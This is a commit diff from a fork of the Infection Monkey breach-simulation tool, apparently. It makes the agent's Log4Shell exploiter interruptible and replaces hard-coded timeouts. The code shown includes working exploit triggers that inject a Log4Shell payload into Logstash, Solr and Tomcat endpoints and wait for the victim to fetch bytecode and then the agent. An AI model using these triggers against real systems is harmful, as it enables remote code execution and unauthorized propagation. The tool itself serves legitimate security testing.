forked from p15670423/monkey
Merge pull request #1796 from guardicore/1611-interruptable-log4shell
Agent: Make log4shell interruptable
This commit is contained in:
commit
663c1c6471
|
@ -1,6 +1,7 @@
|
|||
import logging
|
||||
import time
|
||||
|
||||
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
|
||||
from infection_monkey.exploit.log4shell_utils import (
|
||||
LINUX_EXPLOIT_TEMPLATE_PATH,
|
||||
WINDOWS_EXPLOIT_TEMPLATE_PATH,
|
||||
|
@ -12,12 +13,13 @@ from infection_monkey.exploit.log4shell_utils import (
|
|||
from infection_monkey.exploit.tools.http_tools import HTTPTools
|
||||
from infection_monkey.exploit.web_rce import WebRCE
|
||||
from infection_monkey.i_puppet.i_puppet import ExploiterResultData
|
||||
from infection_monkey.model import DOWNLOAD_TIMEOUT as AGENT_DOWNLOAD_TIMEOUT
|
||||
from infection_monkey.model import DROPPER_ARG, LOG4SHELL_LINUX_COMMAND, LOG4SHELL_WINDOWS_COMMAND
|
||||
from infection_monkey.network.info import get_free_tcp_port
|
||||
from infection_monkey.network.tools import get_interface_to_target
|
||||
from infection_monkey.utils.commands import build_monkey_commandline
|
||||
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
|
||||
from infection_monkey.utils.threading import interruptable_iter
|
||||
from infection_monkey.utils.timer import Timer
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
@ -25,10 +27,8 @@ logger = logging.getLogger(__name__)
|
|||
class Log4ShellExploiter(WebRCE):
|
||||
_TARGET_OS_TYPE = ["linux", "windows"]
|
||||
_EXPLOITED_SERVICE = "Log4j"
|
||||
SERVER_SHUTDOWN_TIMEOUT = 15
|
||||
REQUEST_TO_VICTIM_TIMEOUT = (
|
||||
5 # Max time agent will wait for the response from victim in SECONDS
|
||||
)
|
||||
SERVER_SHUTDOWN_TIMEOUT = LONG_REQUEST_TIMEOUT
|
||||
REQUEST_TO_VICTIM_TIMEOUT = MEDIUM_REQUEST_TIMEOUT
|
||||
|
||||
def _exploit_host(self) -> ExploiterResultData:
|
||||
self._open_ports = [
|
||||
|
@ -43,6 +43,8 @@ class Log4ShellExploiter(WebRCE):
|
|||
self._start_servers()
|
||||
try:
|
||||
self.exploit(None, None)
|
||||
if self._is_interrupted():
|
||||
self._set_interrupted()
|
||||
return self.exploit_result
|
||||
finally:
|
||||
self._stop_servers()
|
||||
|
@ -134,7 +136,9 @@ class Log4ShellExploiter(WebRCE):
|
|||
# Try to exploit all services,
|
||||
# because we don't know which services are running and on which ports
|
||||
for exploit in get_log4shell_service_exploiters():
|
||||
for port in self._open_ports:
|
||||
intr_ports = interruptable_iter(self._open_ports, self.interrupt)
|
||||
for port in intr_ports:
|
||||
|
||||
logger.debug(
|
||||
f'Attempting Log4Shell exploit on for service "{exploit.service_name}"'
|
||||
f"on port {port}"
|
||||
|
@ -153,14 +157,9 @@ class Log4ShellExploiter(WebRCE):
|
|||
"port": port,
|
||||
}
|
||||
self.exploit_info["vulnerable_urls"].append(url)
|
||||
self.exploit_result.exploitation_success = True
|
||||
self.exploit_result.propagation_success = True
|
||||
|
||||
def _wait_for_victim(self) -> bool:
|
||||
# TODO: Peridodically check to see if ldap or HTTP servers have exited with an error. If
|
||||
# they have, return with an error.
|
||||
victim_called_back = False
|
||||
|
||||
victim_called_back = self._wait_for_victim_to_download_java_bytecode()
|
||||
if victim_called_back:
|
||||
self._wait_for_victim_to_download_agent()
|
||||
|
@ -168,12 +167,12 @@ class Log4ShellExploiter(WebRCE):
|
|||
return victim_called_back
|
||||
|
||||
def _wait_for_victim_to_download_java_bytecode(self) -> bool:
|
||||
start_time = time.time()
|
||||
timer = Timer()
|
||||
timer.set(Log4ShellExploiter.REQUEST_TO_VICTIM_TIMEOUT)
|
||||
|
||||
while not self._victim_timeout_expired(
|
||||
start_time, Log4ShellExploiter.REQUEST_TO_VICTIM_TIMEOUT
|
||||
):
|
||||
while not timer.is_expired():
|
||||
if self._exploit_class_http_server.exploit_class_downloaded():
|
||||
self.exploit_result.exploitation_success = True
|
||||
return True
|
||||
|
||||
time.sleep(1)
|
||||
|
@ -182,14 +181,12 @@ class Log4ShellExploiter(WebRCE):
|
|||
return False
|
||||
|
||||
def _wait_for_victim_to_download_agent(self):
|
||||
start_time = time.time()
|
||||
timer = Timer()
|
||||
timer.set(LONG_REQUEST_TIMEOUT)
|
||||
|
||||
while not self._victim_timeout_expired(start_time, AGENT_DOWNLOAD_TIMEOUT):
|
||||
while not timer.is_expired():
|
||||
if self._agent_http_server_thread.downloads > 0:
|
||||
break
|
||||
|
||||
# TODO: if the http server got an error we're waiting for nothing here
|
||||
time.sleep(1)
|
||||
|
||||
@classmethod
|
||||
def _victim_timeout_expired(cls, start_time: float, timeout: int) -> bool:
|
||||
return timeout < (time.time() - start_time)
|
||||
|
|
|
@ -2,6 +2,7 @@ from logging import getLogger
|
|||
|
||||
import requests
|
||||
|
||||
from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
|
||||
from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter
|
||||
from infection_monkey.model import VictimHost
|
||||
|
||||
|
@ -15,7 +16,7 @@ class LogStashExploit(IServiceExploiter):
|
|||
def trigger_exploit(payload: str, host: VictimHost, port: int):
|
||||
url = f"http://{host.ip_addr}:{port}/_node/hot_threads?human={payload}"
|
||||
try:
|
||||
requests.get(url, timeout=5, verify=False) # noqa DUO123
|
||||
requests.get(url, timeout=MEDIUM_REQUEST_TIMEOUT, verify=False) # noqa DUO123
|
||||
except requests.ReadTimeout as e:
|
||||
logger.debug(f"Log4shell request failed {e}")
|
||||
|
||||
|
|
|
@ -2,6 +2,7 @@ from logging import getLogger
|
|||
|
||||
import requests
|
||||
|
||||
from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
|
||||
from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter
|
||||
from infection_monkey.model import VictimHost
|
||||
|
||||
|
@ -15,7 +16,7 @@ class SolrExploit(IServiceExploiter):
|
|||
def trigger_exploit(payload: str, host: VictimHost, port: int):
|
||||
url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
|
||||
try:
|
||||
requests.post(url, timeout=5, verify=False) # noqa DUO123
|
||||
requests.post(url, timeout=MEDIUM_REQUEST_TIMEOUT, verify=False) # noqa DUO123
|
||||
except requests.ReadTimeout as e:
|
||||
logger.debug(f"Log4shell request failed {e}")
|
||||
|
||||
|
|
|
@ -2,6 +2,7 @@ from logging import getLogger
|
|||
|
||||
import requests
|
||||
|
||||
from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT
|
||||
from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter
|
||||
from infection_monkey.model import VictimHost
|
||||
|
||||
|
@ -16,7 +17,9 @@ class TomcatExploit(IServiceExploiter):
|
|||
url = f"http://{host.ip_addr}:{port}/examples/servlets/servlet/SessionExample"
|
||||
payload = {"dataname": "foo", "datavalue": payload}
|
||||
try:
|
||||
requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
|
||||
requests.post( # noqa DUO123
|
||||
url, data=payload, timeout=MEDIUM_REQUEST_TIMEOUT, verify=False
|
||||
)
|
||||
except requests.ReadTimeout as e:
|
||||
logger.debug(f"Log4shell request failed {e}")
|
||||
|
||||
|
|
Loading…
Reference in New Issue